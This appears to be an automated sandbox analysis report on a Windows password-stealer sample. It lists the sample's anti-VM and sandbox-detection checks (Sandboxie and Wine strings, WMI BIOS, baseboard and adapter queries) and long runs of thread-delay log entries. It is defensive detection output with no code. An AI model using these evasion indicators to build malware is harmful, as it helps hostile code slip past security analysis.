Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 5996, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.309903707.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.309903707.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 6016	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 4152	Thread sleep count: 9863 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -99780s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -99666s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -99505s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -99123s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -99014s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -98905s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -98794s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -98686s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -98577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -98467s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -98357s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -98249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -98140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -98027s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -97921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -97810s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -97700s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -97593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -97479s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -97368s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -97249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -97139s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -97030s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -96921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -96812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -96686s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -96574s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -96452s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -96336s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -96203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -96093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -95984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -95874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -95765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -95656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -95546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -95437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -95326s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -95218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -95109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -94999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -94890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -94777s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -94671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -94559s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344	Thread sleep time: -94453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 4908	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -99859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5324	Thread sleep count: 9738 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -99750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -99640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -99531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -99421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -99301s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -99156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -99015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -98906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -98671s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -98546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -98421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -98310s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -98198s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -98077s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -97828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -97718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -97593s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -97473s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -97356s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -97203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -97093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -96968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -96859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -96734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -96623s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -96484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -96359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -96250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -96138s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -96023s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -95738s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -95623s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336	Thread sleep time: -95416s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Window / User API: threadDelayed 9863			Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Window / User API: threadDelayed 9738			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 99780	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 99666	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 99505	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 99123	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 99014	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 98905	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 98794	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 98686	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 98577	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 98467	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 98357	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 98249	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 98140	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 98027	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 97921	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 97810	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 97700	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 97593	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 97479	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 97368	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 97249	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 97139	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 97030	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 96921	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 96812	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 96686	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 96574	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 96452	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 96336	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 96203	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 96093	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 95984	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 95874	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 95765	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 95656	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 95546	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 95437	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 95326	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 95218	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 95109	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 94999	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 94890	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 94777	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 94671	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 94559	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Thread delayed: delay time: 94453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 99859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 99750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 99640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 99531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 99421	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 99301	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 99156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 98671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 98546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 98421	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 98310	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 98198	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 98077	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 97828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 97718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 97593	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 97473	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 97356	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 97203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 97093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 96968	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 96859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 96734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 96623	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 96484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 96359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 96250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Thread delayed: delay time: 96138	Jump to behavior
